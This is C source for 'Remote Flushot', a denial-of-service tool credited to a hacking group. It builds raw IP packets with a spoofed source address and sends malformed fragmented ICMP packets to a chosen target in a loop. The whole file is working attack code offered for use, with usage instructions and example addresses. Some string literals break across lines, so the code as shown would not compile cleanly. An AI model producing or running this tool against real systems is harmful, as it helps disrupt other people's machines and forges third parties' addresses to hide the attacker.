#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
void banner(void) {
printf("Remote Flushot
v 1.0\n\n");
printf("\n\n");
}
void usage(const char *progname)
{
printf(" usage:\n");
printf("./flushot
[Spoofed IP] [Destination IP] [# of FLushot to Send]\n",progname);
printf(" [Spoofed
IP] : ex: 205.56.78.0\n");
printf(" [Destination
IP] : ex: 201.12.3.76\n");
printf(" [# of FLushot
to Send] : 100\n");
printf("The Flu Hacking
Group (c)\n");
printf("DarkShadow
PlimoMan Hack The Planet\n");
}
int resolve( const char *name, unsigned
int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct
sockaddr_in));
addr->sin_family =
AF_INET;
addr->sin_addr.s_addr
= inet_addr(name);
if (addr->sin_addr.s_addr
== -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family
= host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int
nleft = len;
register u_short
*w = addr;
register int
sum = 0;
u_short answer
= 0;
while (nleft
> 1) {
sum += *w++;
nleft -= 2;
}
if (nleft ==
1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >>
16) + (sum & 0xffff);
sum += (sum
>> 16);
answer = ~sum;
return(answer);
}
int send_winbomb(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char
*packet;
struct iphdr
*ip;
struct icmphdr *icmp;
int rc;
packet = (unsigned
char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8);
ip = (struct iphdr
*)packet;
icmp = (struct icmphdr
*)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct
iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl
= 5;
ip->version
= 4;
// ip->tos
= 2;
ip->id
= htons(1234);
ip->frag_off |= htons(0x2000);
// ip->tot_len = 0;
ip->ttl
= 30;
ip->protocol = IPPROTO_ICMP;
ip->saddr
= spoof_addr;
ip->daddr
= dest_addr->sin_addr.s_addr;
ip->check
= in_cksum(ip, sizeof(struct iphdr));
icmp->type
= 12;
icmp->code
= 0;
icmp->checksum
= in_cksum(icmp,sizeof(struct icmphdr) + 1);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len
= htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->frag_off = htons(8
>> 3);
ip->frag_off |= htons(0x2000);
ip->check
= in_cksum(ip, sizeof(struct iphdr));
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char * *argv)
{
struct sockaddr_in
dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET,
SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"ERROR: Opening raw socket.\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr)
== -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr)
== -1) { return(-1); }
printf("Status: Connected....packets
sent.\n",argv[0]);
for (i = 0;i <
atoi(argv[3]);i++) {
if (send_winbomb(sock,
src_addr,
&dest_addr) == -1) {
fprintf(stderr,"ERROR: Unable to Connect To luser.\n");
return(-1);
}
usleep(10000);
}
}